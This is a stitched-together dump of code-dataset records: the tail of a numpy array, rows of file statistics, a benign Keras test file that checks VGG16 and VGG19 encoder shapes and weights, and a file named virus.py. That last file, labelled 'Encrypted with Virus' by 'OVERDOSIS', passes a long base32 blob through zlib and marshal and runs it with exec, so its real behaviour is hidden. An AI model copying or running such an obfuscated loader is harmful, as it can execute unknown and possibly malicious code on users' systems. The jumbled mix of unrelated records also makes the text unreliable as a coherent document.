[ 0., 0., 0., 0.],
[ 0., 0., 0., 0.],
[ 0., 0., 0., 0.],
[ 0., 0., 0., 0.],
[ 0., 0., 0., 0.],
[ 0., 0., 0., 0.],
[ 0., 0., 0., 0.],
[ 0., 0., 0., 0.],
[ 0., 0., 0., 0.],
[ 0., 0., 0., 0.]], dtype=float32)
| 35.592593
| 52
| 0.17898
| 213
| 1,922
| 1.615023
| 0.239437
| 0.924419
| 1.377907
| 1.825581
| 0.465116
| 0.465116
| 0.465116
| 0.465116
| 0.465116
| 0.465116
| 0
| 0.333725
| 0.557232
| 1,922
| 53
| 53
| 36.264151
| 0.070505
| 0
| 0
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.038462
| 0
| 0.038462
| 0
| 0
| 0
| 1
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
99ccb12bab23c9892feb8168bd2ca7f51320d7ad
| 3,937
|
py
|
Python
|
tests/test_encoders.py
|
psmaAaron/keras-fcn
|
90843ef7465e0ce289f0a45a62d2d176a932e7ab
|
[
"MIT"
] | null | null | null |
tests/test_encoders.py
|
psmaAaron/keras-fcn
|
90843ef7465e0ce289f0a45a62d2d176a932e7ab
|
[
"MIT"
] | null | null | null |
tests/test_encoders.py
|
psmaAaron/keras-fcn
|
90843ef7465e0ce289f0a45a62d2d176a932e7ab
|
[
"MIT"
] | null | null | null |
import numpy as np
import tensorflow.keras.backend as K
from tensorflow.keras.layers import Input
from keras_fcn.encoders import (
VGG16,
VGG19)
from tensorflow.keras.utils.test_utils import keras_test
@keras_test
def test_vgg16():
for data_format in ['channels_first', 'channels_last']:
K.set_image_data_format(data_format)
if K.image_data_format() == 'channels_first':
x = Input(shape=(3, 500, 500))
pool1_shape = (None, 64, 250, 250)
pool2_shape = (None, 128, 125, 125)
pool3_shape = (None, 256, 63, 63)
pool4_shape = (None, 512, 32, 32)
drop7_shape = (None, 4096, 16, 16)
conv1_weight = -0.35009676
else:
x = Input(shape=(500, 500, 3))
pool1_shape = (None, 250, 250, 64)
pool2_shape = (None, 125, 125, 128)
pool3_shape = (None, 63, 63, 256)
pool4_shape = (None, 32, 32, 512)
drop7_shape = (None, 16, 16, 4096)
conv1_weight = 0.429471
encoder = VGG16(x, weights='imagenet', trainable=False)
feat_pyramid = encoder.outputs
assert len(feat_pyramid) == 5
assert K.int_shape(feat_pyramid[0]) == drop7_shape
assert K.int_shape(feat_pyramid[1]) == pool4_shape
assert K.int_shape(feat_pyramid[2]) == pool3_shape
assert K.int_shape(feat_pyramid[3]) == pool2_shape
assert K.int_shape(feat_pyramid[4]) == pool1_shape
for layer in encoder.layers:
if layer.name == 'block1_conv1':
assert layer.trainable is False
weights = K.eval(layer.weights[0])
assert np.allclose(weights[0, 0, 0, 0], conv1_weight)
encoder_from_scratch = VGG16(x, weights=None, trainable=True)
for layer in encoder_from_scratch.layers:
if layer.name == 'block1_conv1':
assert layer.trainable is True
weights = K.eval(layer.weights[0])
assert not np.allclose(weights[0, 0, 0, 0], conv1_weight)
@keras_test
def test_vgg19():
for data_format in ['channels_first', 'channels_last']:
K.set_image_data_format(data_format)
if K.image_data_format() == 'channels_first':
x = Input(shape=(3, 500, 500))
pool1_shape = (None, 64, 250, 250)
pool2_shape = (None, 128, 125, 125)
pool3_shape = (None, 256, 63, 63)
pool4_shape = (None, 512, 32, 32)
drop7_shape = (None, 4096, 16, 16)
conv1_weight = -0.35009676
else:
x = Input(shape=(500, 500, 3))
pool1_shape = (None, 250, 250, 64)
pool2_shape = (None, 125, 125, 128)
pool3_shape = (None, 63, 63, 256)
pool4_shape = (None, 32, 32, 512)
drop7_shape = (None, 16, 16, 4096)
conv1_weight = 0.429471
encoder = VGG19(x, weights='imagenet', trainable=False)
feat_pyramid = encoder.outputs
assert len(feat_pyramid) == 5
assert K.int_shape(feat_pyramid[0]) == drop7_shape
assert K.int_shape(feat_pyramid[1]) == pool4_shape
assert K.int_shape(feat_pyramid[2]) == pool3_shape
assert K.int_shape(feat_pyramid[3]) == pool2_shape
assert K.int_shape(feat_pyramid[4]) == pool1_shape
for layer in encoder.layers:
if layer.name == 'block1_conv1':
assert layer.trainable is False
weights = K.eval(layer.weights[0])
assert np.allclose(weights[0, 0, 0, 0], conv1_weight)
encoder_from_scratch = VGG19(x, weights=None, trainable=True)
for layer in encoder_from_scratch.layers:
if layer.name == 'block1_conv1':
assert layer.trainable is True
weights = K.eval(layer.weights[0])
assert not np.allclose(weights[0, 0, 0, 0], conv1_weight)
| 38.980198
| 73
| 0.586487
| 518
| 3,937
| 4.262548
| 0.150579
| 0.081522
| 0.04529
| 0.067935
| 0.896739
| 0.896739
| 0.896739
| 0.896739
| 0.896739
| 0.896739
| 0
| 0.112974
| 0.303023
| 3,937
| 100
| 74
| 39.37
| 0.691691
| 0
| 0
| 0.847059
| 0
| 0
| 0.037084
| 0
| 0
| 0
| 0
| 0
| 0.235294
| 1
| 0.023529
| false
| 0
| 0.058824
| 0
| 0.082353
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
99d01c8775e8f0a323fb3aaa664efceede8c150c
| 29,617
|
py
|
Python
|
virus.py
|
Darkrulex/P91D
|
eb1e47926827c2cbf3ad76fb3b4542d6ae8317f8
|
[
"Apache-2.0"
] | null | null | null |
virus.py
|
Darkrulex/P91D
|
eb1e47926827c2cbf3ad76fb3b4542d6ae8317f8
|
[
"Apache-2.0"
] | null | null | null |
virus.py
|
Darkrulex/P91D
|
eb1e47926827c2cbf3ad76fb3b4542d6ae8317f8
|
[
"Apache-2.0"
] | null | null | null |
#Encrypted with Virus
#Created by OVERDOSIS
import marshal,zlib,base64
exec(marshal.loads(zlib.decompress(base64.b32decode("PCOO3PIJOQOMS6JGDBMQPAF2OAPQJL2OWK55TYABKQKY4AWQNRFA2ATESMRACQQFWLIU3GQDEUVBGQACVCBZKCISNCIZFHRJRNWI7LAZL4NF6GW3WJL3FZCD6I6M7DF54NR6IOOWFOG574326Z42ZXM5LGX4PM732ZV675PW7HGVWPNPG37D6IXSVDFKUAV2JE2AAFKBAQRCGMZC7Y4PFDZ7X3746PZSQT7QXUW727U274NGT4IJL7UXZA5CDN5NXBCG4SZC5YR3O7JC5YT3P7JCDYQLOAZCDYSLOG2EXSI5Y3QU6ETHFO2JYRB6I5SIYTB6I5SYYQR6I5SEYSR6I5SUYRR6I5SMYSN4T3LGRT52BLTMBO452QREXD3JH5KWSJWSHN63RCSBDMW2J3KAA6JMCFU7GI2E5MQGUEBOU3XL4RTOO4JC2QCWXOEEUCLNESHWTK52RHLEGVCKL4EC5NJQLE4EJNDO6LDBKGS5HVCFM66JMNBKI637J3TFKSXPMGRFESUPCCK5E6EUVCKLUY2EUV2B2JZKEXTQLIVWIIOSUJKFEZVDXOL5QJWLKCXSJ6JNWJ6JPSXJGSESUCZAHKOMJHSC3NMT3R7JDKC54T3EWGF6JTKG44X3CTIZXCHWRIQJUET2BCUKJGOUL2JLE32QWKHIQG2HFPOTQRSSFKS7GBP2Q4JHPAR6O2FKQJ7JCWW7OJP2Q5LHTCVEN33RD3JU6QBVABT5OCDKRL7AYUZJ2G3HBGCOOMHMY5YIBKD54TJTIERH5JUYYJEIPIDCGSNCT3C4QICRZ5QWJCFI7UMBSJXKABDENCA2Y5EIVKAJCFEWEZEUVCBRQGJD5KIIQDDDMSOKQIYYPGK2QKKR4AULS7M6VBRXR6I2KHDTC4UBVCXWFZCDIQ6Y7EIPCP2TLDF4J3KAWGEZEDVIOMDSSGUB7RWIERIV7R6ICRISOMDSRGUBOMLSTGUJGGDZQOUFGGFZIK2KWRF5ITLHZJEY6ZVXDHBQHEOPHON6ZP2P3UV7JP7435CJGRVIM2LQOOS2QKPKNQ7L7TWSLJUDBGOP4W2IZKPHOOLYVRL42GENBNDCK3XC6LWJAPTKNKJ75WQOLPHR762BF7MTT77QSYQE5BWUQN5BADCWZIDBGKIURDEO3HIXDI4RI2H5YSM6D4P4ZWXRUQRT52UIB446FQ4O7CECHHWKDKKAYUWQBOB3FHRTJRSX2XK6Z6XWOFGT3DZBD4SKHD6AVL7DCV2VDJX7NCUI5YJ7DZMRZEFNHMBZQMRA3OM4NRXAC2DB6GY3POC4OPZWGYSVW5ZQ7HWVSR5GW7M22WJLFMG7H6OFW5P3CM35NRWDCP2AUN3CNGSCNHACVLGHGBGXNUXQG3IGWZ4COJ4J4AJATSLU2Y3DVS4DDVRYJKXSGE4SBMQ6XCCZK33NWU7SE4YGKFUKUX7SRPLBPH5765XUNSEJGM4I4RGGZGBL7ERLX5JKQZXV4TO7TKJ56GUS2MJ3OLVTFRHPVX6QZWKY2RLHQ2UYT5FV6SW6XF66WKPEZYMTS4X4UV5HMTTZHL5HN5GE6TC6XEY4LHY3YLTW5XVYOFOZ5GMYX3SCNAJ7GOGM7TCPZTFDHN5GF5PEVC3HZYTEOEZDYNRYGQZDMNB255XBLMYGR7A3DJHOPX6R27LZL6GIIBBO5O5O443DNT6LCM43LGGXKU4ZSOBPJ7V7F6CNPG3JRFZPN3UOW2X4UPLT5GQ4JCHCPRQGNGHMJYDZ7HA73U7SISQ3BLWNNOF5O5BTHYZDIORQSSJPXLS5XE4X37M4XSXK62PSDNNGMLL7LJ7FGKY26SCY2D6TXITFPCXZVQLKPEZBGEYDYNBYHSIBYS6K2P4UK7K5SPTZIJNFVCFZF3S4XY4DCE57GQ6XD7XSYXVZG4K5LW4DURNDCNX4MB4HYZU65RCACL7I7H57XMGIX5A7WUNRGGAZ7OMYOE2GF6GWZ5RPFX3GOLD62G72RZGUA65GVLXI6IGGKEVP74GF3UND4I4UHT7WV7SHIOZBU6MZAYEGNDBKLNZGF5O367TJ42TNDY2R526Q2ZK5G63YYE7ULZDFWXY7TC6JSVSUHU7ZDSLIQZYVHS5M4TZOX6PFVUVXGU5TCNDKORYJ4ZLECM4A4NWRQWVRL5M5M4RGS2TNB7WVFHLYBTW35R77BYCB75JL5GHN34UK425ZJRPNKVBES4LGJUQ4LCFATMWKOV6ZT5TYVOUGRRJUBP6VU3SZU5GQE7VYMEXI2ZMELQB37EZA3N6FCQSO7SEPEWN24ZFCAPGAMJTPV2ASX7KUWTB7RAHSALXYZBVAAWHXEOES5UW7EQAVVZK2TAKP6FUW5PZKYVFGUBAQGBENCA2ECEECEAGEDBAGSQK26NSCRGVU2IBPZCHXYIBQHT2JDHUHQT2NB65M5JTKR6URT46PJE6VCDOINO2QB4SII4JRYHRKRACBQNLFDORDNCB4UIRAN4QHTDCWLO2DBI3ESXFFBHMQWDNEYHQFZBBYSPAMSC2QMUR4EXI5KB6XVNGY77TBRXWKVVSINCIQJLLZ542FF4LIV2XZXDWVRTIUJQ5TZAFC4XGAEHH2Y22K2GAAKMTOVAM2LKGG6WWGSLL4IXRSKGR2HDA5X6INLGS5GRS6KHXGXMVRWFUGJCQFTBTENP73YEVXIPXH4UUVVOH4WYTE6KWZNQ7KOGXSVRBNTRAVEUT56KA2APXBYEYF7ENH3FNRJAO4XFDH5ANXORMRM4UY3BSGD4YF4LWJUJTPKHD57PS3JMTIFLZLKIRN7DTIVES3GNFMS4IVPNGVXX2S4RFXJ4QXFGR2FLY2ZWMTPTVYOPOCRSXTFN2N3JNPCKS5VKRBZ4VTBYJ52DQ5LQYX2PXKAG5X2LZLKS3PKOHIUPPYUCWAOFPZK2AVMPFPVRV3ZTPQ7AK4KOHHPZYDEX6YSKX5D7V3UYYEUJQYEULVPFCV3KYTTRKIXIZ5B7SYU2H5GMTHSSJANU7E5MNHJZONXQYYFOLONLC6ZRRG6TO2KTO5CT24ZLXIIVELHRXLXKZKZCZGDMXQEY2QS757GBJNE4BXGMC6RXDR6KADSQWTWVYOAO3DZYTWKF4TBMEMZMN3AKGOOEDDF6LMPRFCTLQVG7LLLTPY5R4HEKU6KX2FZHB6OJPSXQXUVM3J6FGP7HKAO7ELXZKYJZANCTJIYLOD2SZMROJIC7GWGBCIY4EARCBGZBOVO35AHTEBRXAG4XZECHQZU3WIHNSD3PCJIB2F3XKPQG4TG42OJ3VUNUFXVLVQMGNE2WHCXUG42MANZS3KZGKYUJE3HGZANJBPGFQYIV6VACR6IVPTK7DKJXNUUYREXNCQTAB3NP4TK3CKGHMQOEYNQM2JJA2VMFQUVYP6CS2HECPOJEGVETAKJJ7KTF76QWMPXJ4DU22UQ3KSXASD2LFV7HNKLKAU62K6OCMVHWF3YP7A4T6Q25EKAOH4OFIADCNQ7WAO6B4EE6L4ENYHMYEQLNRTAMFLZCHDT45FRMAG34LKCCMNW2QDWAU4VPJJN6TAWRJP4XK4QGHHOOJXJFPQAGJ2OHA622FKPOCWQTOMWA6EOK6XAB4ZFDOQDLCGMDBWTMLHSYIGFDGRZYOINLLGE6GUIGM3UVA3HG6FAJH2KDEVAYO6FWKO44KWL7FYPIAH73KC7YFNHQWMV5UTTGGDNFSA6ZY5N7BXEUJJVQGCYKIZNUYZ6X6D24QKW7KYYH2X4APTLXAHTECTWINA5NYBNT5WM4MDJ3YJYPFFKALDIAJMR27H6IPDWC66HOAJLFS7VJSPVZUGWBI5DA2C5Y34QNRVGBHU5GXQBEOATQ7GDRHN3XEZ3ZC57KPM23RMKLEUDHS4Z7T7JXBSPP33Q2G3O46U6RMB2PDKAXPPTVA4RE5G6JIT526KYOZ4Q7JTPG4TJW3A63HBAZF3BSRJXKZCV5WE4CUHVVWNHSQ24SNNM4Q3EIH72JZISTWX3VU5CHEEHOZFWPTONCJI5HYQ3WE5CQ6HJK5AFKTEMWLEP3O4BVMAZPOXORVRLIVNCT7EW2ABCFLI6WDEDJJNRMX6WMGIY2GKHBLH53FLY4GMHGRWTKU57UTBLOHEKEIJXLMSUY2RQYM63NRPO7JRPDXWCJGTNUIABTLJDB3ZYJNLAYO6QIFSG5CTLUSHBDP742U3DGGS3STJDDSTJLHONEWKSWJ4QIOAI6KXD6ZKTIEYW44GO4LS3TBTAW6CP7JEOYO6IBVV6R56AMOMOLYF5BXYPVCOPFCIR7TF7SRITJQFFHHYS6LSSMIP4ISH6HYV7ZBID72RDTSOD2RUZ6IQ2EUNR6MPAP32AL27ADPHDSRUPQOHNERIYNCADK6TA4HTPYGDJP6ODRVSQ4B6ZYP7IWBIPG7Q4FBREPSMHOAXEIWOE5MHMOYILOYYQFPT4INVQEABTCFDDOMHSKQP7T4J3HEKBLTJD6SDEQX7GNYHIRZKUOUBT6AUJ42ZTCE2DNAYVW7Q7YS2SUXTELWOCJT4XAOR77UC4RVJSGLVW7GA4OUIMBYF25VZ3UWBGJ7C5M4CAPKYN3AMPSZ5YQPGCF55Z2F4GHTXLCYUPWCFBTQDIR7SGHDLLL3CGXD3DGTBKHGQXTQHQMXLE6UJFLNSIH3T3ZB6M7ACTFZ2PY75HRYVPHWT23UTMSQINJE4M373NTLIDTAUXCGIW3YM2B73YEA5K3VHI4DH3FDLGWG5CCZGFY4QIPFLTY7GRB3ZTND3I7HPBBAHKSGJEC4UL7EJJIOABIQZ6ZMXO4GXQKMBP6F3Z47Q5DSEUXWPNBKEIMQM63AGBSIDGOWAY7AATAFLAZOXAMJRWZU63UDKTY2O4KXHYUOJVQM4ASWKHNYBRQYRS66DXGOP2ES47XCYY6W2QIK7UTZDHXKCQDMJ2N2OHEPJZVVSRNKCRPU2SPP5JCY3LSXJXTDHWMFEQ6KIXZ4PJUWMI5XLYLOL27JDPZELK6XMVV3PXRYUHRX5HMQ5DV4RQYKBMTNFJ3WDVTISKWMRZ2QWH2OTQIGIUFDDXCDYAW4Z6XNCNQVH7X4AR2R7YIUO6L4OB6LEG3GCBFS3WNJRGNZPZFZ3OJRHF7G42XN6OVOX55LULD3QSHR2XJWZSGP2KTH53V6XKU4Y6M5GB54HL6UQ4D22NHTF4KT3DLSR4YHJF26S4JBJNLT7ZDHXGG2ZHZGRZDA6AZWWTINQACJYIPNVMBO6EPJ23UKDVRGI2OYRNECPOC4UAILUGO75TB2NQEQLXCJNZKKK4BYQ7VM2B26TXAPEJ2IP6D3RQXIL3SYXECKT7RAJ5MHY6W47HFPHCLU6EJZMWX5NS5JYAB3S3BAC6YANADHD24SVYUZI7WYCG3ZBKQYKKTIC42YIZERKBXPZKMHUIHBVOA347EA4MRMZUHHWFEB6WH7KRVQNXLJVAUL4PWLUVQQXIDTUDGP6MYBHQPLD44QBEI4HT65NXCZSF3QSQBEDD2QJU64PZH6HYLSBMXOQRIO4PHEYPMXOX5CYSFWEKXFCKV43RHFDIBQCJYAJLBUPVVDWMKZR3OQOBR2IO2HSBDJVEXFNMM3LTVZCKPZB4SEUJHXYZCJB6FBMT4QQBFEY5VRP2CQARSY5UAOQBEKO7I7FOCMZQLQWSY4GYXLVOFJJ4SQOKK5ELIWPSFUGKEL53DRWYHHSNSMPUM6IEUMWOFTQAELT3Q3XFCJVRUYNSNXP5OAAHKZYCTGEM2QCGNWDA44BPBBSW3V37LAXBVJR5JW3LMJS43ZMUFWDNI4ZB7ZMKNOK2BWPC3ZIZOAOAS43JK3EBOLTMIUJDEDJHA6EFA6BAROA7SOGGFNZMDDTWY5ZSVZV7FKV5BTM5EJ5RHQA2A3SNR7KQZAWSRMOQGFYDKAUNC6ZSN4VOX4SUZMASSRGCEHMGIVXT6NE3S7Y27ZHD4FMLQLJ5S34T5GE4S22WM3PZBZTOJ6SG7S5T24XE3TC5SPTCNLW7SUXN6SOLK2TOMBYBNZDBBY7KMS4ZMZTO3WKSM32NJZB24W7U4E7UILQX22KJY5S2X56P32Y2KZX4XURWUYZMAFCD7VWQHXMF6ADBGSTNWHAGEIAUJJAQYAS4B7YJZX6WJZF7J5MAXGDPUQ6YGGZLTBT3IO6AQFTY7NPKL2H3IXPKCFL4BTU7KTWA7YYUFLVDQHZKJ2DNUZJTORLGBZKNKCDSS3HE7L4LUNH3ESEWIOSC5AIYEARXJDUDLBIARNEAORZ5ERP5FBAYRDOOYEKJZ2CVTVEVCWEEZIXTJKXVVAAWIFGJQC5ESAI3OHJANHDEKKR4GCWN3WB3TD6QXZ7YKHDDQWUQAADWURW2AEG6L453HRASKVKGD4JDXTIYX4U4X4N2U3HQBDOUMAHIH7UQ7PLL7UWUSPKYUHLRORNMJXSWCUVFLKNK2WVE2NNVZGTXPUEF6Q6A5EMB3UZJMT6L5PYWJYHKIHOB74WRX6Q6DYMB4GJ5F3H3YNBTYOI762RWN2HIYJKTUY4SC7XY4LYQLA7BSKEBJQ7RQOUIBVIYJS5PQZT4PBSTYME5JQS6RVGUOX6OFK4WGN2XF2WC2BAOEHJD5YLZHCFRYW4RKTC7L4YC6JOHA4JI4ONYNYXV3PKJUNUVOEMS5D4GZXZQGSTB7IIJ2OLOHC5QMFAVYURDG45RFJUTQG6RSX5DXLVJYAQFXUMJ7GN3GS3XCOURDGSZO4TOQOXIERTOZXDJEUHYIV6HGLHUVJJMY2WKUPPX472VHF7PPQDII6GHO2RVFB4F7HU352PB4SUML6PNSNWYTXKHCGP64BKIXT4ZCBHUXDLP5SDP6LHMJ47RNPN2CM4GG52QGD2Y2C75IGQOWCU4VIER2ZMUJXIOAXCIUA2ZQUJSFINSQ6WMMN7TYDL5DEQYVDICCTJVLLK7ZYMFWZVDVH2AXXFRKQHXJCRR7AYL4Y3H27HLQNCCSBZXNMZVGS5H5766QTCMD6JZHVFEXCB62ELAUPFKCVZ4VZWPYTH6A7NHAADMZKTBEOQ4V37JQRZLHKZNKEUV6QSVAO55RDV2E5MNYVARN37EASGQXPNX45HKTSXPFWVVLX72YOCXGOGGEZOULEFVY4MWG4UBIB7ADJBIF57IJLOS6VNZD5PAM4DIUCYFFQK7K7UOVDYCWWLFL5DUJVBMCGMR4OGMJLDOONUIIZWCYTGAE5BP5YHMIJYTCUU7YN5P3WKAYEJV4SDDFLXNFSMNOC7KHSXOZMCJQZIQJTQBCJK4RUZS5SJJFI5FZBMFWUUHFBAC5I2ZIKTAAFOVA6HSEIJNTDIIJMQGYJB3QJMY2IGJRRYZL3IOSNBIWMDGYINUQVB3YYIW6A3JKQVJWDIKKAU4Q54SOQR3JTLNSF3BLEZBOVJ5MLANKBYCUO5MKFZBUOVOSHSBDGOEYW2P5UFYRG2LOGMMB25U35MGP2RYLJXZC5ZUQO6SQHAK5YWAUGBOGMCZ7IO6TFBZ5X5LFGPWC7QLBVQ47LQYBZKR3QLTIXHEK2AYFEVAAIW7EH47AJ7L6LJHQVN3FS2UQA56ENJRP7O3JP3QZHN6EM7RAP2FT7JY6QX6HGGDM5NJADE6WRWABE3LYQV3UWNFHSSZJRGL7KORTSOLSU3RUMHP44I5EEBJFYTPVUEEDTU5HZMRB2ABEFZHKFATKJX6O4N3FX3HJCR7KDUXOG7GE6VEQGCTTU3JP3JND2BPUQEPYRYGEWQLHIH3DY6SNHBJAPZ2A32AHD7PGVWQXVI6NGMVY2EBNHJEHBFDPXUGVI67OUWQO6OYIVLCSMAMA7VCMFNHL2QHEOK7V7V6QBGI7ML6BGSEDTA7L5SBOALYHPRCQ4WA3Q7YL4BTA3XDOFCSLP5PCED2YQDM7J6POBQQA3YKQ5IFYDCJSFNBMGL3JJMNJFOC6RFFKYFFJ3NDH4QVWYIBN6OKJMNYCKU3IFHEVNVUXDAQWDKRQ2QTFAOBSB7FM3NJIR5WCCSEG25HJNECZE3I34ZAKBCHABBISZH5RFLCRNZXXOEG5SY67ECSJMKTZW2VW255OSF5CHJCSUGKQJANLJX3OY3DXJCZCHC2QW4BWBKBXALUJWIJ2JWDY3KBSGYBIBCBSGMIBGTXFRZP7XSOJOYQ7JE3X3KE7XEHL3B6MNS32FTLXCORE5FDXR5ARYDTDECX2DUUKAF33FCRPAZWPZJXV266C7CBKKTLLQ6MIL53TULDZD56RK4YNYARLT2EE4FYOQWRA3DEWM4R7CX2H6LPXKCVZ4YCU5Q5QILCDEM5QLBQWQGRTILPHJWO5VTO3GAOIHVASTK566MD2I4U6ZV647YDNGP55D73LE2SNLIKL22WGLSA6AZQJJWL5NDSHQCGOQPIKRP4P7RTGD2Z6SDUL6L74UZXXHNIPSM6X443Q5FKROUHKSO4P6VOAY6SPJR5TRTK3WKZE5GONSX3MXKG6HZJ56JU76OMULHFKR6T4366OMDHNI7KN74K3Y6O6TA4YHK57542F44VFYUZ7KTX4UTWUYTTD5L766NCPHNIJGDVMB6MSLH5IQKMHQOTAXTUU4HGA2RCMC7FLW22YZYPUMI3MYB6NSZMSQZJCLQ2WQMCNXS3IFNPBFX6DHY2BIVXCQIANYIXCRLA25KELQPWV3RMFRAQBLQWIAYZ2DAL6GKEUEJSSMIE5WJSITMYMOQROJSDXQRKTJJGI6EK5USODTO53GE3TGUX4WNDPLS5TPQIJDWTIJAZ3WFJA4ZAYQQ7JOR7FF5OJ3PJRP2FKY3AM4KUKBTMWNXAZRGMGJXZFJORCNQLPNIEHPO5KOXIR4ZCJYCVKEWSHLWLJHHWQEXYA2QHU27OZEHBNHLJM2Z4TAWUPNYVOYIEOFSOBZLHV4VSMOMXP3HQULBRYHZOXAOSTNXUAW6JT4U42NJUJ3PSLRTBC4SGIFENWUACZDXZMTEW4Z4ZALVKDTCLOGXEPPEFAHLXNFEIVGNO4O2F2QFUG5AL54CHRGT3PJGLPHC3WEFFFKGWW3JI2JXJY4J5K5M4Q4EE3ENWBR5IBHV5F7CCDO6I5QS3ZGU3JYIL5C5FQSAJSOTZKTJ5XOIZLLXLOUXUANVN6PKCQ2O6NE7CNL7ED7IEO4S26U7JZGHSCQVEPZLZERTIHYJXWWIC3UHYSID5CMQMFLYHIAUCUSQGCDOCOGKLTEUIH2M2S2AFQJCAQMSCABSVWYZO6AIV4REV3VWJY4Q2L2GDKFTVYUWA2A2XJMRPFEUEOCE5GY6BVBG4TCAKCEETP43KAUKTI2JEY5CEYSIDNQB57JX22KSIQDEKZCIISDEKZCEIRJCEMRKEJRSEMWOOZY3JQAENZP3EVGWXVCPOS6IOZHQWQNVKBAODFLSBTWLSVOGSUA6MTM7CXHWJXSJX4TOF57PS4VDVIATYZQHX4M7NV45LR6U34YUXQI5IJSUNTESLNNVAQJBSTRXAH5EK6TYUPDGVE2WEUVTF7BJKGUWZLOCPSVMUI3LCVBGWUKSXJPKCTLRHVL6PUWEJCI2EZKUASGUZXW4F7DTDFAV6CD5YIUAQ4K73MUMQT5F5FTDJYPR3EBB6U2HAQOAVF5AKOXQEERN3L7VACM3BK2T2VFO53QYAJIVNXUQ5BYKYNKMABMUSSTDJADIJMSZCXRK5S43HBPNNRGSEW4TZALEE2RDFCAFHCJ3JQ3G7IUYCUR32U3XV6IEOEPSGABFE5XPUMUMNIACWQ2KLQXXYMUERVZ5B5RRYXYNQMY2QI4RRLNXRY66X4T7G4FTTFEQXWGIC2IL465ILDIUHRPKD3IXIJRVO4ELDHGKZ46WMR4F3OOSAUN3N2Z753AWUYIXBUPDXQ4CIDCETFBP4EO5FM2MHJZMGBAC22EOIXN5IYUVP2MNFVYCYKXQYOYGVNFXTUTWXL26R47N2ZQZ7I23T5ZVHDR536THZ57AGTSZX7QD2OKB6DY4TCTHYLDYMCNHFNXBYA2OK3YOJZJ35ULYMCNPFWNGAPJZJ6OQQFU4VSPQQFU4UXY7TSTPYZXEYA2OK4LU66NCEPO7U3GMIDSMKN5JWD2MKP7OFYBU4VVS2B5GFHX3IHUYUZOGUK6FDEWLBYJY5EY3XCOZAOWXVTEMGGO5BAJQWJ75ICXW6QHVWUKJRAXDUHQSXACAGUEOEKOGB7ORAAHC4HVTZ5MS2JOIROUAIAJMN2KRSQKUKKEDARIEQCJHOLQILXC5KKOAZGO3MHQ6FIDQHUCMF6WQHQE26GS2FLXFKTBX2H2N3DL7GDVLRT2IOBOYU6VQQCR6MR3BUWAICK2GSFUVRQE3R3XFMI7AW5AB6QSX6SGYUBPGMFJR4VDA7T7VAYSRPMW4JJPTPOBVADRNJTT3NAXGA2TAXQCCJSTTUZJDJZJTZQSD5I4YWIQFI7RIF4L3LAT4CI6E4JCOZIP7VEF4WZTGSMJKH7VHZUVBDMI46GTAIXAG6H5N2BNGNA7SVKWEG7SU47GG2LFOFA4WWQHRAG6DVRELMATA3PBALFTXMDOHLXBTXK5ARJFZ5A7PQ4ITTJ4PRD6KR5FZZTWKZ2DNHUT3VHET54QEB5FWQ7AUJX3BG76D2XAJAOXYQ7FHLUEDSTQRENV6HYMYWC6IDSRRTQ4MX7ADKBTGRALWCNU7QJEBDFV2Y3EY3TACRG57V72QCTPM2PJPYGX3UA2L7EJT2PZRMXANJ7VDV7YQWRMCYICKRULTSXNVX7HXUBY7LTNMQMCELPDSPYADK2QC5R7MGJABPRSA6GWQKIENDFYNYN2LWHWU7UXA64ANW7QNGJZSWDEGNVDTQZQ4SWHCBBQNEH5ZINBMOVE4OEGVN3R7RNJTRRYSJPCNPKQSYRZ57VQKJQ54HCDHGIZEWWRKMA7VAMOU57OAO7NIS3IIBYVYL2XTKILPQHC6EL6CLSUCQCWSYYAFAUO4VAQGXZYDLOUVAVGQZ5IP2VLBNBE5ZIBJ4LKSMMI7OELGQPXFVRE3LWFXRC5VRCDUWFXRK2XULHBHQI5AAF7RX52CSCY27D5N3TUVAVWM23RIGOYWS53KAMNNRJ4I2BQ52TVHCA645C2DML2XM2IDHI6YLH3WN7Q2PSIWP23NC32HT5X37HJMQXIPO32T735OANHFG5F3KAP3W4UY6S5VAH53OKJTUXNIB7O3STPFECD5743OKLYOJZJ34VVKBXML6TLZU5KBXMD7TNZKSVA3WB7ZXUS2BKQ67X5G7T3QPJZJL4VNKBXM36TNYK6VA3WN7JV4K2VA3WF7JVUSZBOQ65XVH7XY4A2OKC5F3KAP3W4USVJG3QH6NXFJAUY3YA373R44BDAHD6EAUFDX3AJ5N4TXNFZFJLHGZMXTUIKJBWI2IUPRQPWQCNYFABZ7RFAR6GFNAR2AUUKQFAYOPX2IM64H3PQ455IU6EXTGAYY6QEOY7BHSBFP6NCYMJV5IRFFGXQGU7IY7WUIPEKPY3KDI63ZHB7NMT2RQ6OYQYCYCG4LK6ANIPXY7CSVG7G5MJOZ2FMVD23SWVOPRHCBOHEJKYLICQXVWOHARWGKSAAVJBWENQIJXQ7OD2APVXWUSCSH6AECZ4IPCGJLXJIUFNF7VDSIYJPQUZIVWOPSKJUZ5PNEAE44LCM325SKLKGJZNOETA27RTEEX6NCTRP6HSQMUYFXC2VWFJ6WIAXJIDN2VGZU7RHAIKDTHXOGYFZCZIC53AXLDHEARXYNTCUGHYN2CXIEM3G7FGEO2E2E7BUMUFEVBR7LOYDA64LZRI6VA6FG5SXIBYSAGIYOYMFNG4AO3I7N6JF4PMACWFEO3K7M6BZYF37VEUOYPJB5ZR653WVH5SV3AJSKXR45BLHB5A2OU4JVZOYY4TTQPMDDAOMKORUGXBJONOA443UO3VRXDJUWSAG64KLWWUBLON6IC3AYTSELIAB7JRIV5KFW2M7R3AETUYPOER4IFG2RXEGQSR5AQPP5KPLGZYTXSUXIP7XUNFQM7R5YCMIWJXHKOHHLXYJSBIFFHSQKOU77VLR4IFFW65F27QDQOIVUZSL7DYIY47BKX2HEA27D77NCIQMRI7FZJHMRCAV3RDTTFLQCFMBC4AFLNVMDM74CWIVMN4BDOC7AD4TU7RJBHXA2G6ZFXOJPGVIBNZS5MOTY6MVS6INPW